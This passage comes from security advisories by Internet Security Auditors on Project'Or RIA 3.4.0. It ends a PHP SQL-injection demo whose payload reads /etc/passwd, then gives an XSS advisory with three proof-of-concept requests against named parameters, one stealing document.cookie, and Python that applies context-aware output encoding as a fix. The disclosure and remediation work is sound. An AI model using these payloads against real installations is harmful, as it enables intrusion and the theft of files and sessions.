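    $db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
    $db->exec('CREATE TABLE affectation (id INTEGER PRIMARY KEY, name TEXT)');
    $db->exec("INSERT INTO affectation VALUES (42, 'demo resource')");

    $payload = "99942 union (select load_file('/etc/passwd'),null from dual)";
    echo affectation_sql_vulnerable($payload), "\n";   // statement the attacker controls
    var_dump(load_affectation($db, '000042'));          // legitimate identifier
    try {
        load_affectation($db, $payload);
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```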

REFERENCES

http://projectorria.org
http://www.isecauditors.com

CREDITS

This vulnerability has been discovered by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).

REVISION HISTORY

July 26, 2013: Initial release

DISCLOSURE TIMELINE

July 25, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
September 26, 2013: Sent to project support.
November 03, 2013: New release and disclosure.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain-based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are a vendor-independent provider with deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.


2013-018: Multiple XSS vulnerabilities in "Project'Or RIA".

Original release date: July 26th, 2013
Last revised: July 26th, 2013
Discovered by: Vicente Aguilera Diaz
Severity: 4.3/10 (CVSSv2 Base Score)
CVE-ID: CVE-2013-6163

BACKGROUND

Project'Or RIA is an open source Project Management Software, trying to gather in a single tool every functionality needed to organize your projects.
The objective is to keep it simple, easy to use on a day to day activity, while covering most of the project management functionalities.

DESCRIPTION

Multiple XSS vulnerabilities have been detected.
The affected resources and parameters are the following:

	Resource 1:
	/view/parameter.php

	Parameter:
	type

	Resource 2:
	/view/main.php

	Parameter:
	p1value

	Resource 3:
	/view/objectDetail.php

	Parameter:
	objectClass


These vulnerabilities allow arbitrary HTML/script code to be executed in the context of the victim user's browser.

PROOF OF CONCEPT

    A malicious user can inject arbitrary HTML/script code in the affected parameters.

    Example 1 (GET Request):
    http://<projectorria-server>/view/parameter.php?type="><H1><marquee>This+is+an+XSS+example<!--

    Example 2 (GET Request):
    http://<projectorria-server>/view/main.php?directAccessPage=parameter.php&menuActualStatus=visible&p1name=test&p1value=");alert(document.cookie);

    Example 3 (POST Request):
    POST /view/objectDetail.php?destinationWidth=1017 HTTP/1.1
    Host: <projectorria-server>

    objectClass=Affectation<H1><marquee>This+is+an+XSS+example<!--&objectId=42&listIdFilter=&listFilterClause=

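The three examples reach the page in two different output contexts: Examples 1 and 3 land in HTML (an attribute value and element text), while Example 2's p1value lands inside a JavaScript string, where HTML escaping alone is not the right fix. The following is an added example, not Project'Or RIA's own code, showing context-specific encoding for each; the surrounding markup and the setParam name are hypothetical, and the payloads are the ones quoted above.

```python
"""Context-aware output encoding for the advisory's three injection points.
Added example (not Project'Or RIA's own code); the markup templates and the
setParam() name are hypothetical."""
import html
import json

# Payloads quoted in the advisory, URL-decoded ('+' is a space).
XSS_ATTRIBUTE_PAYLOAD = '"><H1><marquee>This is an XSS example<!--'
XSS_JS_PAYLOAD = '");alert(document.cookie);'


def render_attribute(value: str) -> str:
    """HTML attribute context (type parameter echoed into value="..."):
    escape &, <, >, " and ' so the value cannot close the attribute or open a tag."""
    return f'<input type="text" name="type" value="{html.escape(value, quote=True)}">'


def render_text(value: str) -> str:
    """Element-text context (objectClass echoed into the page body)."""
    return f"<h2>{html.escape(value)}</h2>"


def js_literal(value: str) -> str:
    """Build a JavaScript string literal from untrusted data: JSON-encode it
    (escapes quotes, backslashes and control characters), then also escape '<'
    and '/' so '</script>' or '<!--' inside the data cannot end the script block."""
    return json.dumps(value).replace("<", "\\u003c").replace("/", "\\/")


def render_js_string(value: str) -> str:
    """JavaScript string context (p1value passed to a script call)."""
    return f"<script>setParam('p1', {js_literal(value)});</script>"


if __name__ == "__main__":
    print(render_attribute(XSS_ATTRIBUTE_PAYLOAD))
    print(render_text("Affectation<H1><marquee>This is an XSS example<!--"))
    print(render_js_string(XSS_JS_PAYLOAD))
```

Decoding the literal with a JSON parser gives back the original string, which is the property that makes the encoding lossless as well as safe.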

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, which can be leveraged to steal sensitive information such as user credentials, personal data, etc.

SYSTEMS AFFECTED

Tested in Project'Or RIA v3.4.0

SOLUTION

Install the new version.

REFERENCES

http://projectorria.org
http://www.isecauditors.com

CREDITS

This vulnerability has been discovered by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).

REVISION HISTORY

July 26, 2013: Initial release

DISCLOSURE TIMELINE

July 25, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
September 26, 2013: Sent to project support.
November 03, 2013: New release and disclosure.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain-based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are a vendor-independent provider with deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.
